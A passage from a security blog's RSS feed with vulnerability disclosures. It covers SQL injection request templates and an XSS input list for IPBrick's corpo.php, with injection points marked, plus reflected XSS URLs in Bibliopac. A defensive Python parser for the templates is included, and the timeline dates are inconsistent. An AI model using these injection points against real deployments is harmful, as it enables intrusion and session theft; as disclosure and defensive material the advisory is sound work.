name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
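
&lt;p&gt;Each template above flags one parameter with a trailing &lt;code&gt;*&lt;/code&gt; after its value (assumed here to follow the custom injection marker convention that sqlmap uses). As an added example that is not part of the advisory and not IPBrick code, the Python below turns such templates into a per-handler list of flagged parameters, which is the form a defender needs to write a WAF rule or a regression test per corpo.php handler: it reverses the dump's &lt;code&gt;\x0d\x0a&lt;/code&gt; and backslash-quote escaping, rejoins bodies that were wrapped onto extra lines, and handles multipart, urlencoded and query-string inputs. The three sample requests are constructed, abbreviated copies of templates on this page.&lt;/p&gt;

```python
"""Extract the parameters flagged with a trailing '*' from request templates
written in the notation used above: a method line, a URL line and a body in
which CRLF is spelled out as the text \\x0d\\x0a and quotes are backslash-escaped.
Added example, not tooling from the advisory or from IPBrick."""
import re
from urllib.parse import parse_qsl, urlsplit

MARKER = "*"            # assumed: a trailing '*' flags the parameter under test
SEP = chr(38)           # the query-string separator, written by code point


def _unescape(body):
    """Turn the dump's escape text back into real CRLFs and quotes."""
    return body.replace("\\x0d\\x0a", "\r\n").replace('\\"', '"')


def _multipart_fields(body):
    """Yield (name, value) pairs from an escaped multipart/form-data body."""
    text = _unescape(body)
    boundary = text.split("\r\n", 1)[0]      # the body opens with the delimiter
    for part in text.split(boundary):
        part = part.strip("\r\n")
        if not part or part == "--":          # leading empty piece / closing '--'
            continue
        headers, _, value = part.partition("\r\n\r\n")
        # \b keeps filename="..." from being mistaken for the field name
        match = re.search(r'\bname="([^"]*)"', headers)
        if match:
            yield match.group(1), value.rstrip("\r\n")


def marked_parameters(template):
    """Return (handler, [flagged parameter names]) for one request template.

    The handler is the value of the 'pagina' field, which selects the code
    path inside corpo.php, so a result reads as 'this handler, these inputs'.
    Long bodies that were wrapped onto extra lines are joined back together.
    """
    lines = [ln for ln in template.strip().splitlines() if ln.strip()]
    method, url = lines[0].strip().upper(), lines[1].strip()
    body = "".join(lines[2:])
    fields = list(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    if method == "POST" and body:
        if body.startswith("--"):
            fields.extend(_multipart_fields(body))
        else:
            fields.extend(parse_qsl(body, keep_blank_values=True))
    handler = next((v.rstrip(MARKER) for k, v in fields if k == "pagina"), "")
    flagged = [k for k, v in fields if v.endswith(MARKER)]
    return handler, flagged


# Constructed, abbreviated copies of three of the templates above.
SAMPLE_MULTIPART = r'''POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data;
name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
'''
SAMPLE_URLENCODED = "POST\nhttps://ipbrick.domain.com/corpo.php\n" + SEP.join(
    ["pagina=gre_alt_acc*", "idgre=2", "reload=1", "control=2", "lastrmt=0",
     "name=a", "description=b", "active=t", "lo_ip1=10", "alterar=Modify"])
SAMPLE_GET = "GET\nhttps://ipbrick.domain.com/corpo.php?" + SEP.join(
    ["pagina=utilizador_ver_lista", "offset=0", "first_char=", "pesq_nome=*"])

if __name__ == "__main__":
    for sample in (SAMPLE_MULTIPART, SAMPLE_URLENCODED, SAMPLE_GET):
        handler, flagged = marked_parameters(sample)
        print(f"handler={handler!r}  flagged parameters={flagged}")
```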

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;pagina&quot;
webmail_alterado
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;imap_server&quot;
ipbrick.domain.com
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;smtp_server&quot;
ipbrick.domain.com
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;db_server&quot;
localhost
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;login_patch&quot;; filename=&quot;&quot;
Content-Type: application/octet-stream
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;logo_patch&quot;; filename=&quot;&quot;
Content-Type: application/octet-stream
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;can_export&quot;
t
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;admin_users&quot;
10000
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;admin_prefs&quot;
administrator
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_calendar_info&quot;
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_show_company_logo&quot;
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_recur_hide_never&quot;
0*
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_recur_one_year_max&quot;
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;resources_executing_state&quot;
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;resources_resource_users&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;resources_executing_interval&quot;
2
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;lastrmt&quot;
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;event_type_name[1]&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;event_type_doAction[1]&quot;
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;event_type_action[1]&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;show_alt_emails&quot;
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;horde_signature&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;f_accao&quot;
Modify
-----------------------------11122813211374287858922608002--
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;pagina&quot;
webmail_alterado
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;imap_server&quot;
ipbrick.domain.com
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;smtp_server&quot;
ipbrick.domain.com
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;db_server&quot;
localhost
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;login_patch&quot;; filename=&quot;&quot;
Content-Type: application/octet-stream
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;logo_patch&quot;; filename=&quot;&quot;
Content-Type: application/octet-stream
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;can_export&quot;
t
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;admin_users&quot;
10000
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;admin_prefs&quot;
administrator
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_calendar_info&quot;
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_show_company_logo&quot;
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_recur_hide_never&quot;
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_recur_one_year_max&quot;
0*
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;resources_executing_state&quot;
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;resources_resource_users&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;resources_executing_interval&quot;
2
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;lastrmt&quot;
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;event_type_name[1]&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;event_type_doAction[1]&quot;
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;event_type_action[1]&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;show_alt_emails&quot;
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;horde_signature&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;f_accao&quot;
Modify
-----------------------------11122813211374287858922608002--
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
---------------------------9988894693323536491681056513
Content-Length: 540
-----------------------------9988894693323536491681056513
Content-Disposition: form-data; name=&quot;pagina&quot;
voip_placas_pstn_inserir
-----------------------------9988894693323536491681056513
Content-Disposition: form-data; name=&quot;tipoplaca&quot;
115561371*
-----------------------------9988894693323536491681056513
Content-Disposition: form-data; name=&quot;manufacturer&quot;
6
-----------------------------9988894693323536491681056513
Content-Disposition: form-data; name=&quot;numportas&quot;
1
-----------------------------9988894693323536491681056513--

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;pagina&quot;
webmail_alterado
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;imap_server&quot;
ipbrick.domain.com
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;smtp_server&quot;
ipbrick.domain.com
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;db_server&quot;
localhost
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;login_patch&quot;; filename=&quot;&quot;
Content-Type: application/octet-stream
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;logo_patch&quot;; filename=&quot;&quot;
Content-Type: application/octet-stream
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;can_export&quot;
t
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;admin_users&quot;
10000
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;admin_prefs&quot;
administrator
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_calendar_info&quot;
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_show_company_logo&quot;
1*
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_recur_hide_never&quot;
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;tb_plugin_recur_one_year_max&quot;
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;resources_executing_state&quot;
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;resources_resource_users&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;resources_executing_interval&quot;
2
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;lastrmt&quot;
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;event_type_name[1]&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;event_type_doAction[1]&quot;
1
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;event_type_action[1]&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;show_alt_emails&quot;
0
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;horde_signature&quot;
-----------------------------11122813211374287858922608002
Content-Disposition: form-data; name=&quot;f_accao&quot;
Modify
-----------------------------11122813211374287858922608002--

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;CVE-2018-16138 (Cross-Site Scripting) XSS&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Another vulnerability found was XSS across all of the administration pages; it looks like input is not sanitized anywhere. As explained in my other &lt;a href=&quot;http://www.cncs.pt&quot;&gt;post&lt;/a&gt;, this vulnerability can be leveraged to inject JavaScript code and steal authentication tokens, as well as compromise clients if there is an exploit for their browser. It is considered a high-severity vulnerability and should not be found in any application, let alone one that handles the security of the whole enterprise.&lt;/p&gt;

&lt;p&gt;Both persistent (stored) and reflected XSS attacks are possible in this application. For example, if a user is registered with a payload in one of the fields, that payload is rendered on the page whenever the user list is consulted, so any administrator who views the list executes it. This is risky, since any number of problems could arise from it.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;List of detected XSS vulnerable inputs (the * marks the injection point)

* /corpo.php?pagina=insere_licenca&amp;amp;activationcode=1ej5k3*sjnkukola1o&amp;amp;f_accao_file=Licence File
* /corpo.php?pagina=voip_asterisk_manager&amp;amp;alterar=*
* /corpo.php?pagina=voip_asterisk_manager&amp;amp;reload=1&amp;amp;alterar=*&amp;amp;activar=t
* /corpo.php?pagina=voip_options_alterar_altera&amp;amp;option=callcenter&amp;amp;in_estado_acd_remoto=t&amp;amp;in_ip_ACD=&amp;amp;in_suf_ACD=&amp;amp;status_send_queue_log=t&amp;amp;extra_send_queue_log_ip=*&amp;amp;extra_send_queue_log_port=&amp;amp;status_send_queue_log_share=t&amp;amp;extra_send_queue_log_share_ip=&amp;amp;extra_send_queue_log_share_folder=&amp;amp;extra_send_queue_log_share_login=admin&amp;amp;extra_send_queue_log_share_pwd=123456&amp;amp;extra_send_queue_log_share_period=1&amp;amp;extra_send_queue_log_share_hour=0&amp;amp;f_accao=Modify
* /corpo.php?pagina=voip_options_alterar_altera&amp;amp;option=callcenter&amp;amp;in_estado_acd_remoto=t&amp;amp;in_ip_ACD=&amp;amp;in_suf_ACD=&amp;amp;status_send_queue_log=t&amp;amp;extra_send_queue_log_ip=&amp;amp;extra_send_queue_log_port=&amp;amp;status_send_queue_log_share=t&amp;amp;extra_send_queue_log_share_ip=*&amp;amp;extra_send_queue_log_share_folder=&amp;amp;extra_send_queue_log_share_login=admin&amp;amp;extra_send_queue_log_share_pwd=123456&amp;amp;extra_send_queue_log_share_period=1&amp;amp;extra_send_queue_log_share_hour=0&amp;amp;f_accao=Modify
* /corpo.php?pagina=maquinas_inserir&amp;amp;f_type=1&amp;amp;f_nome=1&amp;amp;f_gidnumber=802&amp;amp;f_ip1=192&amp;amp;f_ip2=168&amp;amp;f_ip3=69&amp;amp;f_ip4=111&amp;amp;f_mac1=&amp;amp;f_mac2=&amp;amp;f_mac3=&amp;amp;f_mac4=&amp;amp;f_mac5=&amp;amp;f_mac6=*
* /corpo.php?pagina=show_log&amp;amp;file=*&amp;amp;file2=
* /corpo.php?pagina=show_log&amp;amp;file=system-1519780916.tgz&amp;amp;file2=*
* /corpo.php?pagina=manage_access_log_adv_alt&amp;amp;id_access=*
* /corpo.php?pagina=voip_options_alterar_altera&amp;amp;option=callcenter&amp;amp;in_estado_acd_remoto=t&amp;amp;in_ip_ACD=*&amp;amp;in_suf_ACD=&amp;amp;status_send_queue_log=t&amp;amp;extra_send_queue_log_ip=&amp;amp;extra_send_queue_log_port=&amp;amp;status_send_queue_log_share=t&amp;amp;extra_send_queue_log_share_ip=&amp;amp;extra_send_queue_log_share_folder=&amp;amp;extra_send_queue_log_share_login=admin&amp;amp;extra_send_queue_log_share_pwd=123456&amp;amp;extra_send_queue_log_share_period=1&amp;amp;extra_send_queue_log_share_hour=0&amp;amp;f_accao=Modify
* /corpo.php?pagina=voip_interface_pstn_inserir&amp;amp;nomeinterface=*&amp;amp;tipointerface=NT&amp;amp;opensippeers=0&amp;amp;rxgain=0&amp;amp;txgain=0&amp;amp;fqdn=&amp;amp;msip=&amp;amp;intechocancel=G
* /corpo.php?pagina=utilizador_ver_lista&amp;amp;offset=*&amp;amp;first_char=&amp;amp;pesq_nome=
* /corpo.php?pagina=voip_options_alterar_altera&amp;amp;option=*&amp;amp;dnat=f&amp;amp;voip_public_ip_type_options=0&amp;amp;voip_public_ip_value1_options=&amp;amp;voip_listen_public_ip_type_options=0&amp;amp;voip_listen_public_ip_value1_options=10.0.0.253&amp;amp;int_voip=1&amp;amp;direct_rtp_setup=f&amp;amp;rmzero=f&amp;amp;contacts_server=local&amp;amp;cid_ldapsrv=127.0.0.1&amp;amp;cid_dnsdomain=domain.com&amp;amp;username_remote=admin&amp;amp;password_remote=123456&amp;amp;cid_search=f&amp;amp;cid_search_internal=f&amp;amp;address_restrict=f&amp;amp;voip_pbx_asterisk_answer=t&amp;amp;voip_att_timeout_options=30&amp;amp;voip_call_timeout_options=120&amp;amp;rtp_timeout=600&amp;amp;rtp_hold_timeout=700&amp;amp;agent_timeout_status=f&amp;amp;agent_timeout_extra=30&amp;amp;reg_expire_default=3600&amp;amp;reg_expire_max=3600&amp;amp;qualify_freq=60&amp;amp;reg_attempts=0&amp;amp;sip_videosupport=t&amp;amp;voipoptions_est_directory_users_ext=f&amp;amp;voipoptions_ext_directory_users_ext=*61&amp;amp;voipoptions_ext_directory_users_searchby=lastname&amp;amp;estatttransfer=f&amp;amp;extatttransfer=*1&amp;amp;estbldtransfer=f&amp;amp;extbldtransfer=#1&amp;amp;estado_pickup_ext=t&amp;amp;extra_pickup_ext=*8&amp;amp;estado_pickup_ext_grp=f&amp;amp;extra_pickup_ext_grp=*7&amp;amp;estado_pickup_ext_global=t&amp;amp;extra_pickup_ext_global=*8&amp;amp;extra_pickup_mode=1&amp;amp;estado_block_ext=f&amp;amp;extra_block_ext=*76&amp;amp;estado_unblock_ext_code=f&amp;amp;extra_unblock_ext_code=123456&amp;amp;estado_dnd_ena_ext=f&amp;amp;extra_dnd_ena_ext=*73&amp;amp;extra_dnd_dis_ext=*74&amp;amp;estado_cfw_all_ena_ext=f&amp;amp;extra_cfw_all_ena_ext=*70&amp;amp;estado_cfw_bsy_ena_ext=f&amp;amp;extra_cfw_bsy_ena_ext=*72&amp;amp;estado_cfw_noanw_ena_ext=f&amp;amp;extra_cfw_noanw_ena_ext=*71&amp;amp;estado_acfw_noanw_ena_ext=f&amp;amp;accao_acfw_noanw_ena_ext=0&amp;amp;extra_acfw_noanw_ena_ext=0&amp;amp;estado_retrydial_busy_ena_ext=f&amp;amp;extra_retrydial_busy_ena_ext=5&amp;amp;extra_retrydial_busy_timeout=60&amp;amp;extra_retrydial_busy_restrict=0&amp;amp;estado_barge_ext=f&amp;amp;extra_barge_ext=*9&amp;amp;estado_audio_recording_byphone=f&amp;amp;extra_audio_recording_byphone_seq=*60&amp;amp;extra_audio_recording_byphone_pinauth=&amp;amp;estado_callscreen_ext=f&amp;amp;extra_callscreen_ext=*64&amp;amp;moh_enable=f&amp;amp;id_moh=1&amp;amp;estado_callscreen_callerid_anonymous_ena=f&amp;amp;estado_callscreen_save_records=f&amp;amp;estado_callscreen_automatic_answer=f&amp;amp;prioritizacao=f&amp;amp;estado_recording_demand=f&amp;amp;estado_recording_cache=f&amp;amp;estado_adv_call_stats=f&amp;amp;conta_ftp=f&amp;amp;estado_voip_high_resolution_time=t&amp;amp;estado_dbreporting=f&amp;amp;extra_dbreporting=&amp;amp;ip_media=f&amp;amp;simetric_rtp=t&amp;amp;estado_chef_secretary=f&amp;amp;extra_chef_secretary=*79&amp;amp;forwarding_messages=t&amp;amp;dial_separator=#&amp;amp;estado_click2dial_msg=f&amp;amp;distinctive_ring=t&amp;amp;estado_password_policies=t&amp;amp;extra_password_policies=8&amp;amp;default_call_limit=2&amp;amp;addsipportscount=1&amp;amp;addsipports_0=5060&amp;amp;tls_port=5061&amp;amp;iax_port=4569&amp;amp;extra_udp_error_control=fec&amp;amp;estado_sip_tos=f&amp;amp;sip_tos_0=cs3&amp;amp;sip_tos_1=ef&amp;amp;sip_tos_2=af41&amp;amp;sip_tos_3=af41&amp;amp;estado_iax_tos=f&amp;amp;iax_tos_0=ef&amp;amp;estado_sip_cos=f&amp;amp;sip_cos_0=3&amp;amp;sip_cos_1=5&amp;amp;sip_cos_2=4&amp;amp;sip_cos_3=3&amp;amp;estado_iax_cos=f&amp;amp;iax_cos_0=5&amp;amp;extra_channel_tonezone=pt&amp;amp;f_accao=Modify&amp;amp;addsipports_=   (C&apos;mon!! at least change this to post data!)
* /corpo.php?pagina=utilizador_ver_lista&amp;amp;offset=0&amp;amp;first_char=&amp;amp;pesq_nome=*
* /corpo.php?pagina=vpnssl_policies_ins&amp;amp;policy=*

* /manual/index.php?node=undefined&amp;amp;man_lang=*
* /manual/index.php?node=*&amp;amp;man_lang=undefined
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Every input in this application should be validated, and every value encoded for the context in which it is output (HTML body, attribute or JavaScript), to prevent exploitation of all these vulnerabilities; the state-changing forms should also carry an anti-CSRF token.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Advisory Note&lt;/strong&gt;
If you look closely, you’ll find that I skipped a lot of injection points. The reason is that I was fed up with discovering things. Sorry about that, but just choose a form and test it. There is a probability that it has something wrong in it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;TimeLine&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;29/08/2018 - CVE Request&lt;/li&gt;
  &lt;li&gt;30/08/2018 - Contacted IPBrick to send details&lt;/li&gt;
  &lt;li&gt;25/10/2018 - No response from IPBrick&lt;/li&gt;
  &lt;li&gt;06/11/2018 - Contacted CSIRT since several critical institutions were vulnerable&lt;/li&gt;
  &lt;li&gt;14/11/2018 - Response from IPBrick stating they will analyze the incident&lt;/li&gt;
  &lt;li&gt;03/12/2018 - Email sent, no updates on the matter&lt;/li&gt;
  &lt;li&gt;20/01/2018 - Email sent, no updates on the matter&lt;/li&gt;
  &lt;li&gt;26/12/2018 - Response stating that by the end of January a fix will be provided&lt;/li&gt;
  &lt;li&gt;03/01/2019 - It’s February, disclosing it&lt;/li&gt;
&lt;/ul&gt;
</description>
        <pubDate>Fri, 01 Feb 2019 00:01:00 +0000</pubDate>
        <link>http://www.0x90.zone/web/multiple/2019/02/01/Multiple-Vulnerabilities-IPBrick.html</link>
        <guid isPermaLink="true">http://www.0x90.zone/web/multiple/2019/02/01/Multiple-Vulnerabilities-IPBrick.html</guid>
        
        
        <category>web</category>
        
        <category>multiple</category>
        
      </item>
    
      <item>
        <title>XSS on Bibliopac (CVE-2018-16139)</title>
        <description>&lt;p&gt;Good morning. Today I bring to attention a XSS vulnerability in a library management/inventory software, &lt;strong&gt;Bibliopac&lt;/strong&gt; from Bibliosoft.
This software is used mainly in the Portuguese geographic region by several entities, and it’s somewhat old.
The reason that this could be dangerous has to do with the environment of the vulnerability.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/bibliopac/bibliopacIntro.png&quot; alt=&quot;Bibliopac XSS 1&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Quick introduction to XSS attacks&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;XSS vulnerabilities allow attackers to inject code (often JavaScript) into a webpage. By injecting JavaScript an attacker can try to steal authentication tokens, inject keyloggers (&lt;a href=&quot;https://wiremask.eu/articles/xss-keylogger-tutorial/&quot;&gt;XSS-Keylogger&lt;/a&gt;) or even try to exploit vulnerabilities in the WebKit engine to achieve remote code execution (as in the PS4 and Switch case: &lt;a href=&quot;https://www.youtube.com/watch?v=xkdPjbaLngE&quot;&gt;What do Nintendo Switch and iOS 9.3 have in common? CVE-2016-4657 walk-through&lt;/a&gt;).
This type of vulnerability affects the clients themselves rather than the server data, at least not directly. Imagine there is a back-office, and a system administrator opens the link or visits the page with the payload and gets their session cookie stolen. The attacker can now impersonate the administrator and escalate privileges.
The matter gets worse if, in the given environment, there is single sign-on authentication and the attacker is able to steal those authentication tokens: they can then log in to other applications that have connectors to that SSO service.&lt;/p&gt;

&lt;p&gt;In my research, I found on Google 176 results of this application running on several servers. The matter gets worse when we look at which institutions are running it:
institutions related to education, city halls, or even court-related institutions.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/bibliopac/bibliopacGoogle.png&quot; alt=&quot;Bibliopac XSS 1&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After discovering this vulnerability, I contacted the developer of this application. However, they stated that the software is deprecated and no patch will be issued. Confirming on their website, it is indeed an old software version, and a new product is available (I did not test the new product).&lt;/p&gt;

&lt;p&gt;Despite that, the vulnerability still exists and can be exploited. The following URLs are prone to XSS (the * marks the injection point):&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;strong&gt;/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bin/bibliopac.xic&amp;amp;db=BIBLIO*&amp;amp;lang=P&amp;amp;start=&lt;/strong&gt;
&lt;img src=&quot;http://www.0x90.zone/images/bibliopac/xss1.png&quot; alt=&quot;Bibliopac XSS 1&quot; /&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;strong&gt;/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bin/bibliopac.xic&amp;amp;action=EXTRASEARCH*&amp;amp;search=&lt;/strong&gt;
&lt;img src=&quot;http://www.0x90.zone/images/bibliopac/xss2.png&quot; alt=&quot;Bibliopac XSS 2&quot; /&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Keep in mind that the “db” parameter could be different, since the application allows different databases to be installed.&lt;/p&gt;

&lt;p&gt;If we analyze the source code, we can see the * reflected in the page. Weaponizing the vulnerability, we can trigger an alert message to prove that it works.
In the second injection point the input is capitalized before being reflected, so to fully exploit it we need, for example, to point to a script hosted at another location (HTML tag and attribute names are case-insensitive, so upper-casing does not neutralise the injected tag, only the URL has to survive it).&lt;/p&gt;
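&lt;p&gt;The following is an added example, not Bibliosoft’s code nor code from this post, showing in JavaScript (Node.js) why a reflected value such as the ones listed above (and in the IPBrick list earlier in this feed) is exploitable, why the capitalization at the second injection point is not a defence, and what the fix from the OWASP references below looks like. It models a server-side template that reflects the db and action parameters; the markup, the htmlEscape helper, the host attacker.example and the payloads are constructed for the example.&lt;/p&gt;

```javascript
// Added example, not Bibliosoft's code: a server-side template that reflects
// a query parameter into HTML, in the vulnerable form, in the "upper-cased"
// form seen at the second Bibliopac injection point, and in a hardened form.
// The parameter names (db, action) mirror the URLs in the post; the markup,
// the escaping helper and the payloads are this example's own assumptions.

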